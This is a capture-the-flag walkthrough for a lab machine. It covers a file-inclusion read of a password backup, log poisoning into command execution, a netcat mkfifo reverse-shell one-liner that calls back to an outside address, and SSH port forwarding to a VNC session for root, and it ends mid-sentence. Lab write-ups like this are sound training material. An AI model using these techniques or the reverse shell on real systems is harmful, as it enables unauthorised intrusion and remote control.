FOOTHOLD
If we go to http://10.10.10.84/browse.php?file=pwdbackup.txt we fill find the encrypted password. Another alternate route is via log-poisoning (wasn’t actually able to do it via curl so I did it via burp):
GET /browse.php?file=/var/log/httpd-access.log&c=ls HTTP/1.1
Host: 10.10.10.84
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
We can put our commands in place of “ls” such as “id”,etc. This way we can url-encode our reverse shell one liner and execute it to get the shell back:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
User flag is located in /home/charix
PRIVILEGE ESCALATION
Using netstat -an command we see that it is locally listening on 5801 and 5901, while 5801 was not very useful, googling 5901 showed us that it is a vnc port , so we port forward it to our local ip :
ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84
While trying to open it with vncviewer we see it needs a password, after sometime I remembered about the secret.zip in /home/charix so I downloaded it via netcat and unzipped it with our already obtained password and used that file as the password file in vncviewer:
vncviewer 127.0.0.1:5901 -passwd secret
We transfer root.txt to our system (I couldn’t copy the hash from vncviewer) and submit our flag.
We also found a tool which decrypts the secret file so we can authenticate with that too :
